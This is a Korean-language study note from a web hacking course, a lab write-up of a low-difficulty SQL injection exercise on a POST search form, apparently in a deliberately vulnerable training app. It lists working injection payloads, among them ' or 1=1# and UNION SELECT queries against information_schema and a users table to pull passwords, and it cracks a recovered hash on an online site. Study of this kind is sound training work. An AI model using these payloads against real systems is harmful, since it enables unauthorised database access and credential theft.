웹해킹_3주차 정리

SQL 인젝션 – POST/Search

---

 

 MISSON. 버프스위트를 이용해 사용자들의 id와 password를 획득하자.

난이도 low

모든 공격은 버프스위트를 이용해주세요. 공격 과정은 GET방식과 유사합니다.

 

Quest. 데이터베이스 정보를 알아내세요.

Hint1. DB버전을 확인하는 쿼리를 찾아보세요.

Hint2. @@vesion, database()으로 버전과 이름을 알 수 있습니다.

 

' or 1=1#

을 이용하면 위의 사진과 같이 모든 영화 자료를 출력할 수 있다.

 

'union select all 1,@@version,database(),4,5,6,7#
를 입력해서 데이터베이스 정보를 출력할 수 있다.

---

Quest. 데이터베이스에 존재하는 모든 테이블 명을 출력하세요.

Hint1. GET방식과 쿼리는 같습니다.

 

'union select all 1,2,3,table_name,5,6,7 from information_schema.tables#

를 입력하면 테이블 명을 출력할 수 있다.

---

Quest. 사용자 정보가 들어있는 칼럼을 출력하세요.

Hint1. 사용자 정보는 users테이블에 있습니다.

 

'union select all 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#

를 이용하여 사용자 정보가 들어있는 칼럼을 출력할 수 있다.

---

Quest. 사용자의 id, password, secret, login 정보를 출력해봅시다.

Quest. 사용자의 비밀번호는 해시 값으로 암호화되어 있습니다. 해시값을 크랙해 비밀번호를 알아봅시다. (툴을 설치할 필요 없이 웹사이트를 이용하셔도 됩니다.)

 

Hint1. https://crackstation.net/ 해시값을 크랙할 수 있는 사이트입니다.

Hint2. password값으로 나온 해시값을 크랙해서 나온 결과를 첨부하면 됩니다.

 

'union select all 1,id,password,secret,login,6,7 from users#

를 이용하여 사용자의 id, password, secret, login 정보를 출력할 수 있다.

https://crackstation.net/에서 6885858486f31043e5839c735d99457f045affd0해시값을 크랙하면 아래와 같이 bug를 확인할 수 있다.